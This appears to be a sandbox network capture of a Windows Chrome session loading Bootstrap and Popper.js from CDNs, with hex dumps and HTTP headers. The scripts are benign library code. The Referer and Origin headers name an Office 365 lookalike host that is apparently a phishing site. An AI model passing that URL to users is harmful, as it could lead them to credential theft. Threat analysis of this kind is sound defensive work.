                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 6f 3d 3d 3d 74 7d 29 2c 6e 3d 21 21 69 26 26 65 2e 73 6f 6d 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 6e 61 6d 65 3d 3d 3d 6f 26 26 65 2e 65 6e 61 62 6c 65 64 26 26 65 2e 6f 72 64 65 72 3c 69 2e 6f 72 64 65 72 7d 29 3b 69 66 28 21 6e 29 7b 76 61 72 20 72 3d 27 60 27 2b 74 2b 27 60 27 3b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 27 60 27 2b 6f 2b 27 60 27 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 73 20 72 65 71 75 69 72 65 64 20 62 79 20 27 2b 72 2b 27 20 6d 6f 64 69 66 69 65 72 20 69 6e 20 6f 72 64 65 72 20 74 6f 20 77 6f 72 6b 2c 20 62 65 20 73 75 72 65 20 74 6f 20 69 6e 63 6c 75 64 65 20 69 74 20 62 65 66 6f 72 65 20 27 2b 72 2b 27 21 27 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 27
                                                                                        Data Ascii: o===t}),n=!!i&&e.some(function(e){return e.name===o&&e.enabled&&e.order<i.order});if(!n){var r='`'+t+'`';console.warn('`'+o+'`'+' modifier is required by '+r+' modifier in order to work, be sure to include it before '+r+'!')}return n}function K(e){return'
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 27 3d 3d 3d 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 26 26 2d 31 21 3d 3d 5b 27 2b 27 2c 27 2d 27 5d 2e 69 6e 64 65 78 4f 66 28 74 29 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 3d 74 2c 70 3d 21 30 2c 65 29 3a 70 3f 28 65 5b 65 2e 6c 65 6e 67 74 68 2d 31 5d 2b 3d 74 2c 70 3d 21 31 2c 65 29 3a 65 2e 63 6f 6e 63 61 74 28 74 29 7d 2c 5b 5d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 56 28 65 2c 6e 2c 74 2c 6f 29 7d 29 7d 29 2c 61 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 69 29 7b 55 28 6f 29 26 26 28 6e 5b 74 5d 2b 3d 6f 2a 28 27 2d 27 3d 3d 3d 65 5b 69 2d 31 5d 3f 2d 31 3a 31 29 29 7d 29 7d 29 2c 6e 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65
                                                                                        Data Ascii: '===e[e.length-1]&&-1!==['+','-'].indexOf(t)?(e[e.length-1]=t,p=!0,e):p?(e[e.length-1]+=t,p=!1,e):e.concat(t)},[]).map(function(e){return V(e,n,t,o)})}),a.forEach(function(e,t){e.forEach(function(o,i){U(o)&&(n[t]+=o*('-'===e[i-1]?-1:1))})}),n}function G(e
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 6f 26 26 65 28 74 2e 70 72 6f 74 6f 74 79 70 65 2c 6f 29 2c 69 26 26 65 28 74 2c 69 29 2c 74 7d 7d 28 29 2c 70 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6f 29 7b 72 65 74 75 72 6e 20 74 20 69 6e 20 65 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 6f 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 3a 65 5b 74 5d 3d 6f 2c 65 7d 2c 73 65 3d 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 7c 7c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6f 3d 31 3b 6f 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 6f 2b 2b 29 66 6f 72 28 76 61 72 20 69 20 69 6e 20 74 3d 61 72 67 75 6d 65 6e 74 73 5b 6f 5d 2c 74 29
                                                                                        Data Ascii: o&&e(t.prototype,o),i&&e(t,i),t}}(),pe=function(e,t,o){return t in e?Object.defineProperty(e,t,{value:o,enumerable:!0,configurable:!0,writable:!0}):e[t]=o,e},se=Object.assign||function(e){for(var t,o=1;o<arguments.length;o++)for(var i in t=arguments[o],t)


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.1649744104.18.10.2074436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:22 UTC707OUTGET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1
                                                                                        Host: stackpath.bootstrapcdn.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Sec-Fetch-Storage-Access: active
                                                                                        Referer: https://offce365.auramisteriosafyr.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:22 UTC966INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:22 GMT
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        CDN-PullZone: 252412
                                                                                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                        CDN-RequestCountryCode: US
                                                                                        Vary: Accept-Encoding
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=31919000
                                                                                        ETag: W/"67176c242e1bdc20603c878dee836df3"
                                                                                        Last-Modified: Mon, 25 Jan 2021 22:04:06 GMT
                                                                                        CDN-ProxyVer: 1.04
                                                                                        CDN-RequestPullSuccess: True
                                                                                        CDN-RequestPullCode: 200
                                                                                        CDN-CachedAt: 10/04/2024 02:53:43
                                                                                        CDN-EdgeStorageId: 1029
                                                                                        timing-allow-origin: *
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CDN-Status: 200
                                                                                        CDN-RequestTime: 1
                                                                                        CDN-RequestId: 7fedeed1ac4f734c4f5baf0abe375bbe
                                                                                        CDN-Cache: HIT
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 495220
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 925342de3e9941db-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-24 04:00:22 UTC403INData Raw: 37 62 65 64 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                                                        Data Ascii: 7bed/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 66 69 6e 65 28 5b 22 65 78 70 6f 72 74 73 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 68 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69
                                                                                        Data Ascii: fine(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,h){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defi
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 2c 50 6e 2c 6a 6e 2c 48 6e 2c 4c 6e 2c 52 6e 2c 78 6e 2c 57 6e 2c 55 6e 2c 71 6e 2c 46 6e 3d 66 75 6e 63 74 69 6f 6e 28 69 29 7b 76 61 72 20 65 3d 22 74 72 61 6e 73 69 74 69 6f 6e 65 6e 64 22 3b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 76 61 72 20 65 3d 74 68 69 73 2c 6e 3d 21 31 3b 72 65 74 75 72 6e 20 69 28 74 68 69 73 29 2e 6f 6e 65 28 6c 2e 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 3d 21 30 7d 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 7c 7c 6c 2e 74 72 69 67 67 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 65 29 7d 2c 74 29 2c 74 68 69 73 7d 76 61 72 20 6c 3d 7b 54 52 41 4e 53 49 54 49 4f 4e 5f 45 4e 44 3a 22 62 73 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 22 2c 67 65 74 55 49 44
                                                                                        Data Ascii: ,Pn,jn,Hn,Ln,Rn,xn,Wn,Un,qn,Fn=function(i){var e="transitionend";function t(t){var e=this,n=!1;return i(this).one(l.TRANSITION_END,function(){n=!0}),setTimeout(function(){n||l.triggerTransitionEnd(e)},t),this}var l={TRANSITION_END:"bsTransitionEnd",getUID
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 2c 6c 7d 28 65 29 2c 4b 6e 3d 28 6e 3d 22 61 6c 65 72 74 22 2c 61 3d 22 2e 22 2b 28 6f 3d 22 62 73 2e 61 6c 65 72 74 22 29 2c 63 3d 28 72 3d 65 29 2e 66 6e 5b 6e 5d 2c 75 3d 7b 43 4c 4f 53 45 3a 22 63 6c 6f 73 65 22 2b 61 2c 43 4c 4f 53 45 44 3a 22 63 6c 6f 73 65 64 22 2b 61 2c 43 4c 49 43 4b 5f 44 41 54 41 5f 41 50 49 3a 22 63 6c 69 63 6b 22 2b 61 2b 22 2e 64 61 74 61 2d 61 70 69 22 7d 2c 66 3d 22 61 6c 65 72 74 22 2c 64 3d 22 66 61 64 65 22 2c 67 3d 22 73 68 6f 77 22 2c 5f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 69 28 74 29 7b 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 3d 74 7d 76 61 72 20 74 3d 69 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72
                                                                                        Data Ascii: andler.apply(this,arguments)}},l}(e),Kn=(n="alert",a="."+(o="bs.alert"),c=(r=e).fn[n],u={CLOSE:"close"+a,CLOSED:"closed"+a,CLICK_DATA_API:"click"+a+".data-api"},f="alert",d="fade",g="show",_=function(){function i(t){this._element=t}var t=i.prototype;retur
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 5f 2e 5f 68 61 6e 64 6c 65 44 69 73 6d 69 73 73 28 6e 65 77 20 5f 29 29 2c 72 2e 66 6e 5b 6e 5d 3d 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2c 72 2e 66 6e 5b 6e 5d 2e 43 6f 6e 73 74 72 75 63 74 6f 72 3d 5f 2c 72 2e 66 6e 5b 6e 5d 2e 6e 6f 43 6f 6e 66 6c 69 63 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 66 6e 5b 6e 5d 3d 63 2c 5f 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 7d 2c 5f 29 2c 4d 6e 3d 28 70 3d 22 62 75 74 74 6f 6e 22 2c 79 3d 22 2e 22 2b 28 76 3d 22 62 73 2e 62 75 74 74 6f 6e 22 29 2c 45 3d 22 2e 64 61 74 61 2d 61 70 69 22 2c 43 3d 28 6d 3d 65 29 2e 66 6e 5b 70 5d 2c 54 3d 22 61 63 74 69 76 65 22 2c 62 3d 22 62 74 6e 22 2c 49 3d 27 5b 64 61 74 61 2d 74 6f 67 67 6c 65 5e 3d 22 62 75 74 74 6f 6e 22 5d 27
                                                                                        Data Ascii: _._handleDismiss(new _)),r.fn[n]=_._jQueryInterface,r.fn[n].Constructor=_,r.fn[n].noConflict=function(){return r.fn[n]=c,_._jQueryInterface},_),Mn=(p="button",y="."+(v="bs.button"),E=".data-api",C=(m=e).fn[p],T="active",b="btn",I='[data-toggle^="button"]'
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 74 29 7b 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 76 61 72 20 65 3d 74 2e 74 61 72 67 65 74 3b 6d 28 65 29 2e 68 61 73 43 6c 61 73 73 28 62 29 7c 7c 28 65 3d 6d 28 65 29 2e 63 6c 6f 73 65 73 74 28 4e 29 29 2c 6b 2e 5f 6a 51 75 65 72 79 49 6e 74 65 72 66 61 63 65 2e 63 61 6c 6c 28 6d 28 65 29 2c 22 74 6f 67 67 6c 65 22 29 7d 29 2e 6f 6e 28 4f 2e 46 4f 43 55 53 5f 42 4c 55 52 5f 44 41 54 41 5f 41 50 49 2c 49 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 6d 28 74 2e 74 61 72 67 65 74 29 2e 63 6c 6f 73 65 73 74 28 4e 29 5b 30 5d 3b 6d 28 65 29 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 53 2c 2f 5e 66 6f 63 75 73 28 69 6e 29 3f 24 2f 2e 74 65 73 74 28 74 2e 74 79 70 65 29 29 7d 29 2c 6d 2e 66 6e 5b 70 5d 3d 6b 2e 5f 6a 51 75 65 72 79 49
                                                                                        Data Ascii: t){t.preventDefault();var e=t.target;m(e).hasClass(b)||(e=m(e).closest(N)),k._jQueryInterface.call(m(e),"toggle")}).on(O.FOCUS_BLUR_DATA_API,I,function(t){var e=m(t.target).closest(N)[0];m(e).toggleClass(S,/^focus(in)?$/.test(t.type))}),m.fn[p]=k._jQueryI
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 6e 74 29 2c 74 68 69 73 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 28 29 7d 76 61 72 20 74 3d 6f 2e 70 72 6f 74 6f 74 79 70 65 3b 72 65 74 75 72 6e 20 74 2e 6e 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 69 73 53 6c 69 64 69 6e 67 7c 7c 74 68 69 73 2e 5f 73 6c 69 64 65 28 71 29 7d 2c 74 2e 6e 65 78 74 57 68 65 6e 56 69 73 69 62 6c 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 21 64 6f 63 75 6d 65 6e 74 2e 68 69 64 64 65 6e 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 69 73 28 22 3a 76 69 73 69 62 6c 65 22 29 26 26 22 68 69 64 64 65 6e 22 21 3d 3d 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 63 73 73 28 22 76 69 73 69 62 69 6c 69 74
                                                                                        Data Ascii: his._element.querySelector(nt),this._addEventListeners()}var t=o.prototype;return t.next=function(){this._isSliding||this._slide(q)},t.nextWhenVisible=function(){!document.hidden&&P(this._element).is(":visible")&&"hidden"!==P(this._element).css("visibilit
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 74 3d 6c 28 7b 7d 2c 57 2c 74 29 2c 46 6e 2e 74 79 70 65 43 68 65 63 6b 43 6f 6e 66 69 67 28 6a 2c 74 2c 55 29 2c 74 7d 2c 74 2e 5f 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 3b 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 6b 65 79 62 6f 61 72 64 26 26 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4b 45 59 44 4f 57 4e 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 5f 6b 65 79 64 6f 77 6e 28 74 29 7d 29 2c 22 68 6f 76 65 72 22 3d 3d 3d 74 68 69 73 2e 5f 63 6f 6e 66 69 67 2e 70 61 75 73 65 26 26 28 50 28 74 68 69 73 2e 5f 65 6c 65 6d 65 6e 74 29 2e 6f 6e 28 51 2e 4d 4f 55 53 45 45 4e 54 45 52
                                                                                        Data Ascii: =function(t){return t=l({},W,t),Fn.typeCheckConfig(j,t,U),t},t._addEventListeners=function(){var e=this;this._config.keyboard&&P(this._element).on(Q.KEYDOWN,function(t){return e._keydown(t)}),"hover"===this._config.pause&&(P(this._element).on(Q.MOUSEENTER
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 65 6d 65 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 29 7b 76 61 72 20 65 3d 5b 5d 2e 73 6c 69 63 65 2e 63 61 6c 6c 28 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 24 29 29 3b 50 28 65 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 56 29 3b 76 61 72 20 6e 3d 74 68 69 73 2e 5f 69 6e 64 69 63 61 74 6f 72 73 45 6c 65 6d 65 6e 74 2e 63 68 69 6c 64 72 65 6e 5b 74 68 69 73 2e 5f 67 65 74 49 74 65 6d 49 6e 64 65 78 28 74 29 5d 3b 6e 26 26 50 28 6e 29 2e 61 64 64 43 6c 61 73 73 28 56 29 7d 7d 2c 74 2e 5f 73 6c 69 64 65 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 2c 69 2c 72 2c 6f 3d 74 68 69 73 2c
                                                                                        Data Ascii: ement=function(t){if(this._indicatorsElement){var e=[].slice.call(this._indicatorsElement.querySelectorAll($));P(e).removeClass(V);var n=this._indicatorsElement.children[this._getItemIndex(t)];n&&P(n).addClass(V)}},t._slide=function(t,e){var n,i,r,o=this,
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 74 2e 74 6f 28 69 29 3b 65 6c 73 65 20 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6e 5d 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 27 4e 6f 20 6d 65 74 68 6f 64 20 6e 61 6d 65 64 20 22 27 2b 6e 2b 27 22 27 29 3b 74 5b 6e 5d 28 29 7d 65 6c 73 65 20 65 2e 69 6e 74 65 72 76 61 6c 26 26 28 74 2e 70 61 75 73 65 28 29 2c 74 2e 63 79 63 6c 65 28 29 29 7d 29 7d 2c 6f 2e 5f 64 61 74 61 41 70 69 43 6c 69 63 6b 48 61 6e 64 6c 65 72 3d 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 46 6e 2e 67 65 74 53 65 6c 65 63 74 6f 72 46 72 6f 6d 45 6c 65 6d 65 6e 74 28 74 68 69 73 29 3b 69 66 28 65 29 7b 76 61 72 20 6e 3d 50 28 65 29 5b 30 5d 3b 69 66
                                                                                        Data Ascii: t.to(i);else if("string"==typeof n){if("undefined"==typeof t[n])throw new TypeError('No method named "'+n+'"');t[n]()}else e.interval&&(t.pause(),t.cycle())})},o._dataApiClickHandler=function(t){var e=Fn.getSelectorFromElement(this);if(e){var n=P(e)[0];if


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.1649742104.18.10.2074436272C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2025-03-24 04:00:22 UTC718OUTGET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1
                                                                                        Host: maxcdn.bootstrapcdn.com
                                                                                        Connection: keep-alive
                                                                                        Origin: https://offce365.auramisteriosafyr.it.com
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                                                                                        sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                                                                                        Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://offce365.auramisteriosafyr.it.com/
                                                                                        Accept-Encoding: gzip, deflate, br, zstd
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2025-03-24 04:00:22 UTC953INHTTP/1.1 200 OK
                                                                                        Date: Mon, 24 Mar 2025 04:00:22 GMT
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        CDN-PullZone: 252412
                                                                                        CDN-Uid: b1941f61-b576-4f40-80de-5677acb38f74
                                                                                        CDN-RequestCountryCode: US
                                                                                        Vary: Accept-Encoding
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=31919000
                                                                                        ETag: W/"14d449eb8876fa55e1ef3c2cc52b0c17"
                                                                                        Last-Modified: Mon, 25 Jan 2021 22:04:04 GMT
                                                                                        CDN-ProxyVer: 1.06
                                                                                        CDN-RequestPullSuccess: True
                                                                                        CDN-RequestPullCode: 200
                                                                                        CDN-CachedAt: 12/04/2024 01:55:10
                                                                                        CDN-EdgeStorageId: 1067
                                                                                        timing-allow-origin: *
                                                                                        cross-origin-resource-policy: cross-origin
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CDN-Status: 200
                                                                                        CDN-RequestTime: 0
                                                                                        CDN-RequestId: f9207e722b15245c5ab99567b2164cd1
                                                                                        CDN-Cache: HIT
                                                                                        CF-Cache-Status: HIT
                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 925342de482e438c-EWR
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        2025-03-24 04:00:22 UTC416INData Raw: 37 62 66 61 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 30 2e 30 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 74
                                                                                        Data Ascii: 7bfa/*! * Bootstrap v4.0.0 (https://getbootstrap.com) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(t
                                                                                        2025-03-24 04:00:22 UTC1369INData Raw: 22 2c 22 6a 71 75 65 72 79 22 2c 22 70 6f 70 70 65 72 2e 6a 73 22 5d 2c 65 29 3a 65 28 74 2e 62 6f 6f 74 73 74 72 61 70 3d 7b 7d 2c 74 2e 6a 51 75 65 72 79 2c 74 2e 50 6f 70 70 65 72 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 69 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 3b 6e 3c 65 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 7b 76 61 72 20 69 3d 65 5b 6e 5d 3b 69 2e 65 6e 75 6d 65 72 61 62 6c 65 3d 69 2e 65 6e 75 6d 65 72 61 62 6c 65 7c 7c 21 31 2c 69 2e 63 6f 6e 66 69 67 75 72 61 62 6c 65 3d 21 30 2c 22 76 61 6c 75 65 22 69 6e 20 69 26 26 28 69 2e 77 72 69 74 61 62 6c 65 3d 21 30 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69
                                                                                        Data Ascii: ","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i
